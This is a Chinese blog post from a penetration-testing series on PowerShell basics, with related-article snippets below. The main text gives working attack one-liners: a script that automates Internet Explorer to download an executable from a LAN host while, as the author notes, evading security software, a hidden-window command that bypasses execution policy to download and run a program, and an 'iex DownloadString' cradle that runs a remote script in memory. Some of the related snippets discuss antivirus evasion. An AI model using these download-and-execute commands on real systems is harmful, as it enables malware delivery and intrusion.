PowerShell系列之基本姿势(1)

最新推荐文章于 2023-11-18 10:15:08 发布
最新推荐文章于 2023-11-18 10:15:08 发布
阅读量1.3k 收藏 2
点赞数
分类专栏: 内网渗透 漏洞基础 文章标签: powershell 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29647709/article/details/82181466
版权

Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。它引入了许多非常有用的新概念,从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。

执行策略
当我们运行.PS1的脚本文件的时候,发现失败,因为是禁止的 。
这里写图片描述
运行下面命令得到的是Restricted脚本不能运行(默认)

Get-ExecutionPolicy
Set-ExecutionPolicy Remotesigned设置当前策略(本地脚本可以执行)
Set-ExecutionPolicy Unrestricted设置当前策略(允许所有)

利用IE下载文件
至于为什么下载自己体会,发现一下安全软件对这个还是不理睬的附上代码:

$ie = New-Object -Com internetExplorer.Application
$ie.Navigate("http://192.168.1.28/calc.exe")
#------------------------------
#Wait for Download Dialog box to pop up
Sleep 5
while($ie.Busy){Sleep 1}
#------------------------------
#Hit "S" on the keyboard to hit the "Save" button on the download box
$obj = new-object -com WScript.Shell
$obj.AppActivate('Internet Explorer')
$obj.SendKeys('s')
#Hit "Enter" to save the file
$obj.SendKeys('{Enter}')

执行命令

.\down.PS1

远程下载软件并执行:


cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://192.168.1.28','calc.exe');start-process calc.exe

远程执行ps1脚本

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://192.168.1.28/down.PS1')"
tdcoming
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PowerShell常用命令及使用方法
Captain_RB的博客
06-17 5万+
PowerShell 依托.NET Framework平台可以实现非常强大的功能,而且普适性强,Win7及以上系统自带,隐蔽性好,可以直接在内存中运行,能够绕过部分杀软,现将平日操作及内网渗透过程中常用命令及使用方法总结如下。...
我的powershell免杀之路
weixin_43939009的博客
07-11 1163
Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。powershell一直都是内网渗透的大热门,微软是真正的在推行PowerShell,包括Office等更多自家软件,底层都是调用PowerShell来实现,近年来利用powershell来搞内网渗透进行横向或免杀的热度一直居高不下。 / 这次我将结合前人的各种骚操作,以及个人的不断试错,所想所思,来写一篇关于powershell来进行免杀,达到CS多种姿势绕过AV
Windows PowerShell命令大全
热门推荐
有勇气的牛排博客
09-07 4万+
Windows PowerShell 是一种命令行外壳程序的脚本环境,它内置在每个受支持的Windows版中(Windows7、Windows Server2008 R2及更高版本),为windows命令行使用者和脚本编写者利用.NET Framework的强大功能提供了遍历。需要.NET环境支持。
记录一下,在PowerShell执行iex(irm ‘https://img.lelaer.com/gf.ps1‘)时发生如下报错的解决方法之一
最新发布
m0_55937000的博客
11-18 6756
PowerShell执行如下代码。
Powershell免杀系列(二)
st3pby的博客
02-20 3173
技术交流 关注微信公众号 Z20安全团队 , 回复 加群 ,拉你入群 一起讨论技术。 直接公众号文章复制过来的,排版可能有点乱, 可以去公众号看。 正文 powershell的免杀⽅法有很多,对代码进⾏编码是最常⻅的⼀种,这⾥介绍⼀个专⻔⽤来对powershell进⾏编码免杀的框架Invoke-Obfuscation,这也是著名的APT32组织海莲花常⽤的⼀个⼯具。 该工具可以对powershell代码进行 ASCII/hex/octal/binary/SecureS...
Powershell管理系列教程.docx
10-09
PowerShell管理系列教程主要涉及如何使用PowerShell来管理和操作Active Directory(AD),特别是关于用户管理和组织单位(OU)的管理。PowerShell是一种强大的命令行工具,尤其适用于Windows系统管理和自动化任务,...
PowerShell基本使用教程
01-09
个人对PowerShell也不是很熟悉,开始的时候就突然看到开始菜单中多了个叫PowerShell的文件夹,后来一点就看到某个教程视频说PowerShell很厉害但也没怎么听,再后来就看到kali也有了一些PowerShell的脚本这才意识到...
PowerShell脚本写的文件.ps1文件介绍
01-10
.ps1文件是PowerShell写好的脚本文件。在Windows系统中,默认情况下是不允许执行.ps1文件的,那么怎么才能让系统允许执行.ps1文件呢? 什么是“.ps1”文件? 这个是PowerShell写的脚本文本,你可以在记事本中写一段...
PowerShell入门教程之PowerShell管道介绍
01-10
深入理解并熟练使用管道是PowerShell高手之路的必经阶段。没有管道,我们就不得不通过许多的变量来保存中间结果,虽然这是脚本和其他编译型语言的惯用伎俩,但对于战斗在命令行上的Shell而言,就是一件非常痛苦的...
渗透中的Powershell简单使用
03-28
powershell的简单使用。 一些脚本的开发 ,主要用于渗透
Powershell_ps1
04-06
1. **Cmdlets(命令)**:PowerShell中的基本执行单元,它们是以动词-名词形式命名的,如`Get-Process`、`Start-Service`等。Cmdlets是 PowerShell 提供的内置命令,用于执行特定任务。 2. **管道符(|)**:类似于...
PowerShell 基本知识
weixin_46104215的博客
11-07 8875
powershell 下,类似“cmd”命令,叫做“cmdlet”,powershell 命令不区别大小写 为防止恶意脚本的执行,powershell 有一个执行策略,默认情况下,执行策略被设为受限 Get-ExecutionPolicy(执行策略) Restricted:脚本不能受限(默认设置) RemoteSigned:本地创建的脚本可以运行,但从网上下载的脚本不能运行(拥有数字证书签名的除外) AllSigned:仅当脚本由受信任的发布者签名时才能运行 Unrestricted:允许所
powershell IEX
qq_28808697的博客
11-12 5964
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); 该命令将#{remote_script}加载到内存,并没有把该脚本下载到本地。
Powershell键盘发送事件
weixin_37189727的博客
10-26 1634
$wsh = New-Object -ComObject Wscript.Shell $flag = $wsh.AppActivate("title") Start-Sleep -Seconds 3 if($flag){ $wsh.AppActivate("title") Start-Sleep -Seconds 2 $wsh.SendKeys("{TAB 9}") } Add-Type -AssemblyNa...
windows 设置powershell 脚本定时执行
潇峰的博客
04-21 2001
程序或脚本 powershell 位置 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 添加参数 ps文件目录 -windowstyle hidden -NoProfile -NonInteractive -NoLogo -ExecutionPolicy Unrestricted -File "E:\copy.ps1"
powershell中的常用软件打开命令
ahahayaa的博客
08-14 1510
13🏇、systeminfo:查看计算机基本信息。14🏇🐱🐕🐶♎️、notepad:打开记事本。4🏇、gpedit.msc:打开本地组策略。11🏇、dxdiag:查看电脑详细配置信息。1🏇、regedit:打开注册表编辑器。5🏇、explorer:打开资源管理器。3🏇、msconfig:打开系统配置。12🏇、mstsc:打开远程桌面连接。2🏇、control:打开控制面板。7🏇、logoff:直接注销计算机。6🏇、taskmgr:任务管理器。8🏇、osk:打开屏幕键盘。9🏇、calc:打开计算器。
使用Powershell开机启动隐藏窗口的程序
b663455888378594的博客
08-07 810
1.打开注册表找到键值:计算机\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 2.添加字符串值:StartJetServer,添加字符串内容:powershell -executionpolicy unrestricted -file C:\IntelliJIDEALicenseServer\steup-...
powershell渗透常用命令
春日野穹
02-28 1251
powershell渗透常用命令 set-ExecutionPolicy RemoteSigned //开启执行策略 set-ExecutionPolicy Restricted //关闭执行策略 远程下载文件 powershell $h=new-object System.Net.WebClient $h.DownloadFile('http://xx.com/payload/shell/h.sh','C:\Users\xx\Desktop\test\h.sh') 命令行执行ps1文件 powe
powershell脚本的基本语法
06-02
PowerShell脚本的基本语法如下: 1. 变量:使用$符号定义变量,如$VarName = "Value"。变量名不能以数字开头,可以包含字母、数字、下划线等字符。 2. 注释:使用#符号添加注释,如# This is a comment。 3. 控制...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值